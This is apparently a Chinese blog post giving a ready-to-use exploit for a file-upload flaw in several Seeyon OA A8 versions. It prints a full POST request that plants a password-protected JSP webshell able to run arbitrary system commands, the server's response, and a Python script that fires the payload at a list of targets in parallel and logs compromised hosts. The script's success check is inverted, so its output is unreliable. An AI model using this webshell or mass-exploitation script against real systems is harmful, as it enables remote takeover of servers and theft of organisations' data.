
致远OA系统多版本Getshell – 附批量检测Poc



漏洞影响产品版本:

  • 致远A8-V5协同管理软件 V6.1sp1
  • 致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3
  • 致远A8+协同管理软件V7.1

漏洞情况:

访问 /seeyon/htmlofficeservlet 出现 “DBSTEP V3.0 0 21 0 htmoffice operate err”

POST包:


 
 
POST /seeyon/htmlofficeservlet HTTP/1.1
 
Content-Length: 1121
 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
 
Host: xxxxxxxxx
 
Pragma: no-cache
 
DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV
 
OPTION=S3WYOSWLBSGr
 
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
 
CREATEDATE=wUghPB3szB3Xwg66
 
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
 
originalFileId=wV66
 
originalCreateDate=wUghPB3szB3Xwg66
 
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
 
needReadFile=yRWZdAS6
 
originalCreateDate=wLSGP4oEzLKAz4=iz=66
 
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce

 
 
 
 
 
 

响应包:


 
 
DBSTEP V3.0 386 0 666 DBSTEP=OKMLlKlV
 
OPTION=S3WYOSWLBSGr
 
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
 
CREATEDATE=wUghPB3szB3Xwg66
 
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
 
originalFileId=wV66
 
originalCreateDate=wUghPB3szB3Xwg66
 
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
 
needReadFile=yRWZdAS6
 
originalCreateDate=wLSGP4oEzLKAz4=iz=66
 
CLIENTIP=wLCXqUKAP7uhw4g5zi=6
 
 
 
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>

 
 
 
 
 
 

批量检测 (Python)


 
 
# Wednesday, 26 June 2019
 
# Author:nianhua
 
# Blog:https://github.com/nian-hua/
 
 
 
import re
 
import requests
 
import base64
 
from multiprocessing import Pool, Manager
 
 
 
def send_payload(url):
 
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
 
payload = "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"
 
payload = base64.b64decode(payload)
 
try:
 
r = requests.post(url + '/seeyon/htmlofficeservlet', data=payload)
 
r = requests.get(
 
url + '/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+echo+wangming')
 
if "wangming" in r.text:
 
return 0
 
else:
 
return url
 
except:
 
return 0
 
 
 
def remove_control_chars(s):
 
control_chars = ''.join(map(unichr, range(0,32) + range(127,160)))
 
control_char_re = re.compile('[%s]' % re.escape(control_chars))
 
s = control_char_re.sub('', s)
 
if 'http' not in s:
 
s = 'http://' + s
 
return s
 
def savePeopleInformation(url, queue):
 
newurl = send_payload(url)
 
if newurl != 0:
 
fw = open('loophole.txt', 'a')
 
fw.write(newurl + '\n')
 
fw.close()
 
queue.put(url)
 
def main():
 
pool = Pool(10)
 
queue = Manager().Queue()
 
fr = open('url.txt', 'r')
 
lines = fr.readlines()
 
for i in lines:
 
url = remove_control_chars(i)
 
pool.apply_async(savePeopleInformation, args=(url, queue,))
 
allnum = len(lines)
 
num = 0
 
while True:
 
print queue.get()
 
num += 1
 
if num >= allnum:
 
fr.close()
 
break
 
main()

 
 
 
 
 
 